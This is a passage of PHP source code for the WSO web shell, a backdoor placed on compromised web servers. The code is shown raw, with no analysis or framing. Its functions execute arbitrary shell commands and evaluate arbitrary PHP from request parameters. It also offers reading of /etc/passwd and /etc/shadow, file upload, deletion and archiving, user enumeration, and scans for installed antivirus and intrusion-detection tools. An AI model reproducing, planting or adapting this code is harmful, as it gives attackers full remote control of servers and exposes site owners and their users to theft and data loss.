wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick=\"g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')\">[ home ]</a><br>\' . $drives . \'</td>\'\r\n . \'<td width=1 align=right><nobr><select onchange=\"g(null,null,null,null,null,this.value)\"><optgroup label=\"Page charset\">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER[\"SERVER_ADDR\"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\r\n . \'<table style=\"border-top:2px solid #333;\" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style=\"margin:5\">\';\r\n}\r\n\r\nfunction wsoFooter() {\r\n $is_writable = is_writable($GLOBALS[\'cwd\'])?\" <font color=\'green\'>(Writeable)</font>\":\" <font color=red>(Not writable)</font>\";\r\n echo \"\r\n</div>\r\n<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\r\n <tr>\r\n <td><form onsubmit=\'g(null,this.c.value,\\\"\\\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'\" . htmlspecialchars($GLOBALS[\'cwd\']) .\"\'><input type=submit value=\'>>\'></form></td>\r\n <td><form onsubmit=\\\"g(\'FilesTools\',null,this.f.value);return false;\\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n </tr><tr>\r\n <td><form onsubmit=\\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>\r\n <td><form onsubmit=\\\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\r\n </tr><tr>\r\n <td><form onsubmit=\\\"g(\'Console\',null,this.c.value);return false;\\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\r\n <td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\r\n <input type=hidden name=a value=\'FilesMAn\'>\r\n <input type=hidden name=c value=\'\" . $GLOBALS[\'cwd\'] .\"\'>\r\n <input type=hidden name=p1 value=\'uploadFile\'>\r\n <input type=hidden name=charset value=\'\" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . \"\'>\r\n <span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br ></td>\r\n </tr></table></div></body></html>\";\r\n}\r\n\r\nif (!function_exists(\"posix_getpwuid\") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\r\n function posix_getpwuid($p) {return false;} }\r\nif (!function_exists(\"posix_getgrgid\") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\r\n function posix_getgrgid($p) {return false;} }\r\n\r\nfunction wsoEx($in) {\r\n $out = \'\';\r\n if (function_exists(\'exec\')) {\r\n @exec($in,$out);\r\n $out = @join(\"\\n\",$out);\r\n } elseif (function_exists(\'passthru\')) {\r\n ob_start();\r\n @passthru($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'system\')) {\r\n ob_start();\r\n @system($in);\r\n $out = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) {\r\n $out = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,\"r\"))) {\r\n $out = \"\";\r\n while(!@feof($f))\r\n $out .= fread($f,1024);\r\n pclose($f);\r\n }\r\n return $out;\r\n}\r\n\r\nfunction wsoViewSize($s) {\r\n if (is_int($s))\r\n $s = sprintf(\"%u\", $s);\r\n \r\n if($s >= 1073741824)\r\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576)\r\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024)\r\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else\r\n return $s . \' B\';\r\n}\r\n\r\nfunction wsoPerms($p) {\r\n return substr(sprintf(\'%o\', $p), -4);\r\n}\r\n\r\nfunction wsoPermsColor($f) {\r\n if (!@is_readable($f))\r\n return \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n elseif (!@is_writable($f))\r\n return \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n else\r\n return \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\';\r\n}\r\n\r\nfunction wsoScandir($dir) {\r\n if(function_exists(\"scandir\")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\n\r\nfunction wsoWhich($p) {\r\n $path = wsoEx(\'which \' . $p);\r\n if(!empty($path))\r\n return $path;\r\n return false;\r\n}\r\n\r\nfunction actionSecInfo() {\r\n wsoHeader();\r\n echo \'<h1>Server security information</h1><div class=content>\';\r\n function wsoSecParam($n, $v) {\r\n $v = trim($v);\r\n if($v) {\r\n echo \'<span>\' . $n . \': </span>\';\r\n if(strpos($v, \"\\n\") === false)\r\n echo $v . \'<br>\';\r\n else\r\n echo \'<pre class=ml1>\' . $v . \'</pre>\';\r\n }\r\n }\r\n\r\n wsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n wsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n wsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n wsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n wsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n wsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\'))\r\n $temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\n if(function_exists(\'mssql_connect\'))\r\n $temp[] = \"MSSQL\";\r\n if(function_exists(\'pg_connect\'))\r\n $temp[] = \"PostgreSQL\";\r\n if(function_exists(\'oci_connect\'))\r\n $temp[] = \"Oracle\";\r\n wsoSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'<br>\';\r\n\r\n if($GLOBALS[\'os\'] == \'nix\') {\r\n wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?\"yes <a href=\'#\' onclick=\'g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")\'>[view]</a>\":\'no\');\r\n wsoSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?\"yes <a href=\'#\' onclick=\'g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"shadow\\\")\'>[view]</a>\":\'no\');\r\n wsoSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n wsoSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'<br>\';\r\n $temp=array();\r\n foreach ($userful as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $item)\r\n if(wsoWhich($item))\r\n $temp[] = $item;\r\n wsoSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'<br/>\';\r\n wsoSecParam(\'HDD space\', wsoEx(\'df -h\'));\r\n wsoSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n echo \'<br/><span>posix_getpwuid (\"Read\" /etc/passwd)</span><table><form onsubmit=\\\'g(null,null,\"5\",this.param1.value,this.param2.value);return false;\\\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=\">>\"></form>\';\r\n if (isset ($_POST[\'p2\'], $_POST[\'p3\']) && is_numeric($_POST[\'p2\']) && is_numeric($_POST[\'p3\'])) {\r\n $temp = \"\";\r\n for(;$_POST[\'p2\'] <= $_POST[\'p3\'];$_POST[\'p2\']++) {\r\n $uid = @posix_getpwuid($_POST[\'p2\']);\r\n if ($uid)\r\n $temp .= join(\':\',$uid).\"\\n\";\r\n }\r\n echo \'<br/>\';\r\n wsoSecParam(\'Users\', $temp);\r\n }\r\n }\r\n } else {\r\n wsoSecParam(\'OS Version\',wsoEx(\'ver\'));\r\n wsoSecParam(\'Account Settings\',wsoEx(\'net accounts\'));\r\n wsoSecParam(\'User Accounts\',wsoEx(\'net user\'));\r\n }\r\n echo \'</div>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionPhp() {\r\n if(isset($_POST[\'ajax\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', true);\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n $temp = \"document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'\" . addcslashes(htmlspecialchars(ob_get_clean()), \"\\n\\r\\t\\\\\'\\0\") . \"\';\\n\";\r\n echo strlen($temp), \"\\n\", $temp;\r\n exit;\r\n }\r\n if(empty($_POST[\'ajax\']) && !empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']) . \'ajax\', 0);\r\n\r\n wsoHeader();\r\n if(isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\')) {\r\n echo \'<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>\';\r\n ob_start();\r\n phpinfo();\r\n $tmp = ob_get_clean();\r\n $tmp = preg_replace(array (\r\n \'!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU\',\r\n \'!td, th {(.*)}!msiU\',\r\n \'!<img[^>]+>!msiU\',\r\n ), array (\r\n \'\',\r\n \'.e, .v, .h, .h th {$1}\',\r\n \'\'\r\n ), $tmp);\r\n echo str_replace(\'<h1\',\'<h2\', $tmp) .\'</div><br>\';\r\n }\r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit=\"if(this.ajax.checked){a(\\\'Php\\\',null,this.code.value);}else{g(\\\'Php\\\',null,this.code.value,\\\'\\\');}return false;\"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style=\"margin-top:5px\">\';\r\n echo \' <input type=checkbox name=ajax value=1 \'.($_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style=\"\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;\" class=ml1>\';\r\n if(!empty($_POST[\'p1\'])) {\r\n ob_start();\r\n eval($_POST[\'p1\']);\r\n echo htmlspecialchars(ob_get_clean());\r\n }\r\n echo \'</pre></div>\';\r\n wsoFooter();\r\n}\r\n\r\nfunction actionFilesMan() {\r\n if (!empty ($_COOKIE[\'f\']))\r\n $_COOKIE[\'f\'] = @unserialize($_COOKIE[\'f\']);\r\n \r\n if(!empty($_POST[\'p1\'])) {\r\n switch($_POST[\'p1\']) {\r\n case \'uploadFile\':\r\n if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\']))\r\n echo \"Can\'t upload file!\";\r\n break;\r\n case \'mkdir\':\r\n if(!@mkdir($_POST[\'p2\']))\r\n echo \"Can\'t create new dir\";\r\n break;\r\n case \'delete\':\r\n function deleteDir($path) {\r\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\';\r\n $dh = opendir($path);\r\n while ( ($item = readdir($dh) ) !== false) {\r\n $item = $path.$item;\r\n if ( (basename($item) == \"..\") || (basename($item) == \".\") )\r\n continue;\r\n $type = filetype($item);\r\n if ($type == \"dir\")\r\n deleteDir($item);\r\n else\r\n @unlink($item);\r\n }\r\n closedir($dh);\r\n @rmdir($path);\r\n }\r\n if(is_array(@$_POST[\'f\']))\r\n foreach($_POST[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n $f = urldecode($f);\r\n if(is_dir($f))\r\n deleteDir($f);\r\n else\r\n @unlink($f);\r\n }\r\n break;\r\n case \'paste\':\r\n if($_COOKIE[\'act\'] == \'copy\') {\r\n function copy_paste($c,$s,$d){\r\n if(is_dir($c.$s)){\r\n mkdir($d.$s);\r\n $h = @opendir($c.$s);\r\n while (($f = @readdir($h)) !== false)\r\n if (($f != \".\") and ($f != \"..\"))\r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } elseif(is_file($c.$s))\r\n @copy($c.$s, $d.$s);\r\n }\r\n foreach($_COOKIE[\'f\'] as $f)\r\n copy_paste($_COOKIE[\'c\'],$f, $GLOBALS[\'cwd\']);\r\n } elseif($_COOKIE[\'act\'] == \'move\') {\r\n function move_paste($c,$s,$d){\r\n if(is_dir($c.$s)){\r\n mkdir($d.$s);\r\n $h = @opendir($c.$s);\r\n while (($f = @readdir($h)) !== false)\r\n if (($f != \".\") and ($f != \"..\"))\r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\');\r\n } elseif(@is_file($c.$s))\r\n @copy($c.$s, $d.$s);\r\n }\r\n foreach($_COOKIE[\'f\'] as $f)\r\n @rename($_COOKIE[\'c\'].$f, $GLOBALS[\'cwd\'].$f);\r\n } elseif($_COOKIE[\'act\'] == \'zip\') {\r\n if(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n if ($zip->open($_POST[\'p2\'], 1)) {\r\n chdir($_COOKIE[\'c\']);\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($f == \'..\')\r\n continue;\r\n if(@is_file($_COOKIE[\'c\'].$f))\r\n $zip->addFile($_COOKIE[\'c\'].$f, $f);\r\n elseif(@is_dir($_COOKIE[\'c\'].$f)) {\r\n $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.\'/\', FilesystemIterator::SKIP_DOTS));\r\n foreach ($iterator as $key=>$value) {\r\n $zip->addFile(realpath($key), $key);\r\n }\r\n }\r\n }\r\n chdir($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n } elseif($_COOKIE[\'act\'] == \'unzip\') {\r\n if(class_exists(\'ZipArchive\')) {\r\n $zip = new ZipArchive();\r\n foreach($_COOKIE[\'f\'] as $f) {\r\n if($zip->open($_COOKIE[\'c\'].$f)) {\r\n $zip->extractTo($GLOBALS[\'cwd\']);\r\n $zip->close();\r\n }\r\n }\r\n }\r\n } elseif($_COOKIE[\'act\'] == \'tar\') {\r\n chdir($_COOKIE[\'c\']);\r\n $_COOKIE[\'f\'] = array_map(\'escapeshellarg\', $_COOKIE[\'f\']);\r\n wsoEx(\'tar cfzv \' . escapeshellarg($_POST[\'p2\']) . \' \' . implode(\' \', $_COOKIE[\'f\']));\r\n chdir($GLOBALS[\'cwd\']);\r\n }\r\n unset($_COOKIE[\'f\']);\r\n setcookie(\'f\', \'\', time() - 3600);\r\n break;\r\n default:\r\n if(!empty($_POST[\'p1\'])) {\r\n WSOsetcookie(\'act\', $_POST[\'p1\']);\r\n WSOsetcookie(\'f\', serialize(@$_POST[\'f\']));\r\n WSOsetcookie(\'c\', @$_POST[\'c\']);\r\n }\r\n break;\r\n }\r\n }\r\n wsoHeader();\r\n echo \'<h1>File manager</h1><div class=content><script>p1_=p2_=p3_=\"\";</script>\';\r\n $dirContent = wsoScandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']);\r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\';wsoFooter(); return; }\r\n global $sort;\r\n $sort = array(\'name\', 1);\r\n if(!empty($_POST[\'p1\'])) {\r\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match))\r\n $sort = array($match[1], (int)$match[2]);\r\n }\r\necho \"<script>\r\n function sa() {\r\n for(i=0;i<d.files.elements.length;i++)\r\n if(d.files.elements[i].type == \'checkbox\')\r\n d.files.elements[i].checked = d.files.elements[0].checked;\r\n }\r\n</script>\r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>\r\n<form name=files method=post><tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\\"FilesMan\\\",null,\\\"s_name_\".($sort[1]?0:1).\"\\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\\"FilesMan\\\",null,\\\"s_size_\".($sort[1]?0:1).\"\\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\\"FilesMan\\\",null,\\\"s_modify_\".($sort[1]?0:1).\"\\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\\"FilesMan\\\",null,\\\"s_perms_\".($sort[1]?0:1).\"\\\")\'>Permissions</a></th><th>Actions</th></tr>\";\r\n $dirs = $files = array();\r\n $n = count($dirContent);\r\n for($i=0;$i<$n;$i++) {\r\n $ow = @posix_getpwuid(@fileowner($dirContent[$i]));\r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i]));\r\n $tmp = array(\'name\' => $dirContent[$i],\r\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i],\r\n \'modify\' => date(\'Y-m-d H:i:s\', @filemtime($GLOBALS[\'cwd\'] . $dirContent[$i])),\r\n \'perms\' => wsoPermsColor($GLOBALS[\'cwd\'] . $dirContent[$i]),\r\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]),\r\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i])\r\n );\r\n if(@is_file($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n $files[] = array_merge($tmp, array(\'type\' => \'file\'));\r\n elseif(@is_link($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n $dirs[] = array_merge($tmp, array(\'type\' => \'link\', \'link\' => readlink($tmp[\'path\'])));\r\n elseif(@is_dir($GLOBALS[\'cwd\'] . $dirContent[$i]))\r\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\'));\r\n }\r\n $GLOBALS[\'sort\'] = $sort;\r\n function wsoCmp($a, $b) {\r\n if($GLOBALS[\'sort\'][0] != \'size\')\r\n return strcmp(strtolower($a[$GLOBALS[\'sort\'][0]]), strtolower($b[$GLOBALS[\'sort\'][0]]))*($GLOBALS[\'sort\'][1]?1:-1);\r\n else\r\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1);\r\n }\r\n usort($files, \"wsoCmp\");\r\n usort($dirs, \"wsoCmp\");\r\n $files = array_merge($dirs, $files);\r\n $l = 0;\r\n foreach($files as $f) {\r\n echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name=\"f[]\" value=\"\'.urlencode($f[\'name\']).\'\" class=chkbx></td><td><a href=# onclick=\"\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')\">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');\" \' . (empty ($f[\'link\']) ? \'\' : \"title=\'{$f[\'link\']}\'\") . \'><b>[ \' . htmlspecialchars($f[\'name\']) . \' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?wsoViewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick=\"g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')\">\'.$f[\'perms\']\r\n .\'</td><td><a href=\"#\" onclick=\"g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')\">R</a> <a href=\"#\" onclick=\"g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')\">T</a>\'.(($f[\'type\']==\'file\')?\' <a href=\"#\" onclick=\"g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')\">E</a> <a href=\"#\" onclick=\"g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')\">D</a>\':\'\').\'</td></tr>\';\r\n $l = $l?0:1;\r\n }\r\n echo \"<tr><td colspan=7>\r\n <input type=hidden name=a value=\'FilesMan\'>\r\n <input type=hidden name=c value=\'\" . htmlspecialchars($GLOBALS[\'cwd\']) .\"\'>\r\n <input type=hidden name=charset value=\'\". (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\"\'>\r\n <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>\";\r\n if(class_exists(\'ZipArchive\'))\r\n echo \"<option value=\'zip\'>Compress (zip)</option><option value=\'unzip\'>Uncompress (zip)</option>\";\r\n echo \"<option value=\'tar\'>Compress (tar.gz)</option>\";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']))\r\n echo \"<option value=\'paste\'>Paste / Compress</option>\";\r\n echo \"</select> \";\r\n if(!empty($_COOKIE[\'act\']) && @count($_COOKIE[\'f\']) && (($_COOKIE[\'act\'] == \'zip\') || ($_COOKIE[\'act\'] == \'tar\')))\r\n echo \"file name: <input type=text name=p2 value=\'wso_\" . date(\"Ymd_His\") . \".\" . ($_COOKIE[\'act\'] == \'zip\'?\'zip\':\'tar.gz\') . \"\'> \";\r\n echo \"<input type=\'submit\' value=\'>>\'></td></tr></form></table></div>\";\r\n wsoFooter();\r\n}\r\n\r\nfunction actionStringTools() {\r\n if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}}\r\n if(!function_exists(\'binhex\')) {function binhex($p) {return dechex(bindec($p));}}\r\n if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}\r\n if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= sprintf(\'%02X\',ord($p[$i]));return strtoupper($r);}}\r\n if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}}\r\n $stringTools = array(\r\n \'Base64 encode\' => \'base64_encode\',\r\n \'Base64 decode\' => \'base64_decode\',\r\n \'Url encode\' => \'urlencode\',\r\n \'Url decode\' => \'urldecode\',\r\n \'Full urlencode\' => \'full_urlencode\',\r\n \'md5 hash\' => \'md5\',\r\n \'sha1 hash\' => \'sha1\',\r\n \'crypt\' => \'crypt\',\r\n \'CRC32\' => \'crc32\',\r\n \'ASCII to HEX\' => \'ascii2hex\',\r\n \'HEX to ASCII\' => \'hex2ascii\',\r\n \'HEX to DEC\' => \'hexdec\',\r\n \'HEX to BIN\' => \'hex2bin\',\r\n \'DEC to HEX\' => \'dechex\',\r\n \'DEC to BIN\' => \'decbin\',\r\n \'BIN to HEX\' => \'binhex\',\r\n \'BIN to DEC\' => \'bindec\',\r\n \'String to lower case\' => \'strtolower\',\r\n \'String to upper case\' => \'strtoupper\',\r\n \'Htmlspecialchars\' => \'htmlspecialchars\',\r\n \'String length\' => \'strlen\',\r\n );\r\n if(isset($_POST[\'ajax\'])) {\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', true);\r\n ob_start();\r\n if(in_array($_POST[\'p1\'], $stringTools))\r\n echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = \"document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\\'\\0\").\"\';\\n\";\r\n echo strlen($temp), \"\\n\", $temp;\r\n exit;\r\n }\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\']))\r\n WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']).\'ajax\', 0);\r\n wsoHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n echo \"<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>\";\r\n foreach($stringTools as $k => $v)\r\n echo \"<option value=\'\".htmlspecialchars($v).\"\'>\".$k.\"</option>\";\r\n echo \"</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 \".(@$_COOKIE[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\"> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>\".(empty($_POST[\'p1\'])?\'\':htmlspecialchars(@$_POST[\'p2\'])).\"</textarea></form><pre class=\'ml1\' style=\'\".(empty($_POST[\'p1\'])?\'display:none;\':\'\').\"margin-top:5px\' id=\'strOutput\'>\";\r\n if(!empty($_POST[\'p1\'])) {\r\n if(in_array($_POST[\'p1\'], $stringTools))echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n }\r\n echo\"</pre></div><br><h1>Search files:</h1><div class=content>\r\n <form onsubmit=\\\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\\\"><table cellpadding=\'1\' cellspacing=\'0\' width=\'50%\'>\r\n <tr><td width=\'1%\'>Text:</td><td><input type=\'text\' name=\'text\' style=\'width:100%\'></td></tr>\r\n <tr><td>Path:</td><td><input type=\'text\' name=\'cwd\' value=\'\". htmlspecialchars($GLOBALS[\'cwd\']) .\"\' style=\'width:100%\'></td></tr>\r\n <tr><td>Name:</td><td><input type=\'text\' name=\'filename\' value=\'*\' style=\'width:100%\'></td></tr>\r\n <tr><td></td><td><input type=\'submit\' value=\'>>\'></td></tr>\r\n </table></form>\";\r\n\r\n function wsoRecursiveGlob($path) {\r\n if(substr($path, -1) != \'/\')\r\n $path.=\'/\';\r\n $paths = @array_unique(@array_merge(@glob($path.$_POST[\'p3\']), @glob($path.\'*\', GLOB_ONLYDIR)));\r\n if(is_array($paths)&&@count($paths)) {\r\n foreach($paths as $item) {\r\n if(@is_dir($item)){\r\n if($path!=$item)\r\n wsoRecursiveGlob($item);\r\n } else {\r\n if(empty($_POST[\'p2\']) || @strpos(file_get_contents($item), $_POST[\'p2\'])!==false)\r\n echo \"<a href=\'#\' onclick=\'g(\\\"FilesTools\\\",null,\\\"\".urlencode($item).\"\\\", \\\"view\\\",\\\"\\\")\'>\".htmlspecialchars($item).\"</a><br>\";\r\n }\r\n }\r\n }\r\n }\r\n if(@$_POST[\'p3\'])\r\n wsoRecursiveGlob($_POST[\'c\']);\r\n echo \"</div><br><h1>Search for hash:</h1><div class=content>\r\n <form method=\'post\' target=\'_blank\' name=\'hf\'>\r\n <input type=\'text\' name=\'hash\' style=\'width:200px;\'><br>\r\n <input type=\'hidden\' name=\'act\' value=\'find\'/>\r\n <input type=\'button\' value=\'hashcracking.ru\' onclick=\\\"document.hf.action=\'index.php\';document.hf.submit()\\\"><br>\r\n <input type=\'button\' value=\'md5.rednoize.com\' onclick=\\\"document.hf.action=\'?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()\\\"><br>\r\n <input type=\'button\' value=\'crackfor.me\' onclick=\\\"document.hf.action=\'index.php\';document.hf.submit()\\\"><br>\r\n </form></div>\";\r\n wsoFooter();\r\n}\r\n\r\nfunction actionFilesTools() {\r\n if( isset($_POST[\'p1\']) )\r\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') {\r\n if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n ob_start(\"ob_gzhandler\", 4096);\r\n header(\"Content-Disposition: attachment; filename=\".basename($_POST[\'p1\']));\r\n if 